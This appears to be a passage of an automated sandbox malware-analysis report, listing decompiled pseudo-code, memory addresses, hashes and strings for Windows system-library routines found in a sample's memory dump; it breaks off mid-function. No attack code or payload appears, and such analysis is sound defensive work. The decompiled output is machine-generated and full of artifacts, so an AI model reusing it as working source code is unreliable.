                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 2cb0597ff53ecb85948da90e78fcbe1cd47d6302a39cd094a998230995019fa1
                                          • Instruction ID: 98d63ac9f9048c3f5db16409651db7cd50f79ea2fd1d8521e768c962e127d37a
                                          • Opcode Fuzzy Hash: 2cb0597ff53ecb85948da90e78fcbe1cd47d6302a39cd094a998230995019fa1
                                          • Instruction Fuzzy Hash: 47318DB550C3159FCB19DF68E8809ABBBE8EB85654F01092EF99493250D734DD14CB93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01101B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E01101B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0113BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0113A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0113A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L01114620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                          0x01101b8f
                                          0x01101b9a
                                          0x01101b9c
                                          0x01101b9e
                                          0x01101ba3
                                          0x01157010
                                          0x01157010
                                          0x00000000
                                          0x01101ba9
                                          0x01101ba9
                                          0x01101bae
                                          0x00000000
                                          0x01101bc5
                                          0x01101bca
                                          0x01101bcf
                                          0x01101bd0
                                          0x01101bd1
                                          0x01101bd2
                                          0x01101bd6
                                          0x01101bdc
                                          0x01101be0
                                          0x01156ffc
                                          0x01157000
                                          0x00000000
                                          0x01157006
                                          0x01157009
                                          0x01157009
                                          0x01101be6
                                          0x01101bec
                                          0x01101c0b
                                          0x01101c0b
                                          0x01101c0c
                                          0x01101c11
                                          0x01101c12
                                          0x01101c15
                                          0x01101c1b
                                          0x01101c1f
                                          0x01101c31
                                          0x01101c33
                                          0x01157026
                                          0x01157026
                                          0x01101c21
                                          0x01101c24
                                          0x01101c24
                                          0x01101bee
                                          0x01101bee
                                          0x01101bf2
                                          0x01101c3a
                                          0x01101bf4
                                          0x01101bf4
                                          0x01101c05
                                          0x01101c05
                                          0x01101c09
                                          0x01101c3e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01101c09
                                          0x01101bec
                                          0x01101be0
                                          0x01101bae
                                          0x01101c2e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: WindowsExcludedProcs
                                          • API String ID: 0-3583428290
                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction ID: fdf3984c868d9dbd675c2d1c7c8eacecab47245c120dfb2f53b419216895850b
                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                          • Instruction Fuzzy Hash: 8821253A900228FBDB2F9A598940F9BBBADAF81B10F064425FE149B240D778DD00C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0111F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                          0x0111f71d
                                          0x0111f722
                                          0x0111f726
                                          0x01164770
                                          0x0111f765
                                          0x0111f769
                                          0x0111f769
                                          0x0111f732
                                          0x0116477a
                                          0x00000000
                                          0x0116477a
                                          0x0111f738
                                          0x0111f73a
                                          0x0111f73c
                                          0x0111f73f
                                          0x0111f746
                                          0x0111f778
                                          0x0111f7a9
                                          0x0111f7a9
                                          0x0111f754
                                          0x0111f75a
                                          0x0111f75d
                                          0x0111f75f
                                          0x0111f761
                                          0x0111f76f
                                          0x0111f771
                                          0x0111f771
                                          0x0111f76f
                                          0x0111f763
                                          0x00000000
                                          0x0111f763
                                          0x0111f77d
                                          0x0111f7a3
                                          0x0111f7a5
                                          0x00000000
                                          0x0111f7a5
                                          0x0111f77f
                                          0x0111f782
                                          0x0111f784
                                          0x0111f786
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0111f788
                                          0x0111f748
                                          0x0111f74d
                                          0x0111f78d
                                          0x0111f793
                                          0x0111f7b7
                                          0x0111f7bc
                                          0x00000000
                                          0x0111f7bc
                                          0x0111f798
                                          0x00000000
                                          0x00000000
                                          0x0111f79d
                                          0x0111f7b0
                                          0x00000000
                                          0x0111f7b0
                                          0x0111f79f
                                          0x00000000
                                          0x0111f74f
                                          0x0111f74f
                                          0x00000000
                                          0x0111f74f

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Actx
                                          • API String ID: 0-89312691
                                          • Opcode ID: 46dbe4374ea50bcbf08adcb66e72adf6b1021f43da44feca458a099380dac064
                                          • Instruction ID: 054aaa4f4f7bc91c6c8db1371979240432d3684d138e0bb0c552665d673fb4f7
                                          • Opcode Fuzzy Hash: 46dbe4374ea50bcbf08adcb66e72adf6b1021f43da44feca458a099380dac064
                                          • Instruction Fuzzy Hash: 9C110834304F438BF72D4E1CC494736F696EB85224F26453AE562CB3A9D770C80B8342
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011A8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 71%
                                          			E011A8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x11d0d50);
				E0114D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01185720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0114DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0114DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0114D130(_t34, _t39, _t40);
			}





                                          0x011a8df1
                                          0x011a8df1
                                          0x011a8df1
                                          0x011a8df1
                                          0x011a8df1
                                          0x011a8df1
                                          0x011a8df3
                                          0x011a8df8
                                          0x011a8dfd
                                          0x011a8e00
                                          0x011a8e0e
                                          0x011a8e2a
                                          0x011a8e36
                                          0x011a8e38
                                          0x011a8e3c
                                          0x011a8e46
                                          0x011a8e46
                                          0x011a8e36
                                          0x011a8e50
                                          0x011a8e56
                                          0x011a8e59
                                          0x011a8e5c
                                          0x011a8e60
                                          0x011a8e67
                                          0x011a8e6d
                                          0x011a8e73
                                          0x011a8e74
                                          0x011a8eb1
                                          0x011a8ebd

                                          Strings
                                          • Critical error detected %lx, xrefs: 011A8E21
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Critical error detected %lx
                                          • API String ID: 0-802127002
                                          • Opcode ID: eb340a0413f01e6e673429449e3bd39b9bd389892733048836c3b6c8b415b271
                                          • Instruction ID: 861646f9c4dc60a204417e08e9ae6a5e63ba75b74ad9ff17aeeadd40504f1ec5
                                          • Opcode Fuzzy Hash: eb340a0413f01e6e673429449e3bd39b9bd389892733048836c3b6c8b415b271
                                          • Instruction Fuzzy Hash: 79118775D10348EBDF2CDFA8950979CBFB0BB14715F20825EE669AB282C3310602CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0118FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                          Download Yara Rule
                                          Strings
                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0118FF60
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                          • API String ID: 0-1911121157
                                          • Opcode ID: 450eadcd10e1bde3682d6020bc874f4c027aafbb2ffaea12c29405f2245d690f
                                          • Instruction ID: 56b802510521eece3d6b8e0b15be00860de2f69ca965b5ee1d77d8defd512fa5
                                          • Opcode Fuzzy Hash: 450eadcd10e1bde3682d6020bc874f4c027aafbb2ffaea12c29405f2245d690f
                                          • Instruction Fuzzy Hash: 8711E172910545EFEF2AEB94C948F987BB2FB18B18F14C054F5086B1A1C7399951CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C5BA5 Relevance: .6, Instructions: 592COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E011C5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x11d1178);
				E0114D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E011C4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0113D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E011C5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x11e60e8;
								if( *0x11e60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x11e60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01139710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01136DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0113F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0113F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0113F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0113FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0113FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0113F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0113F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
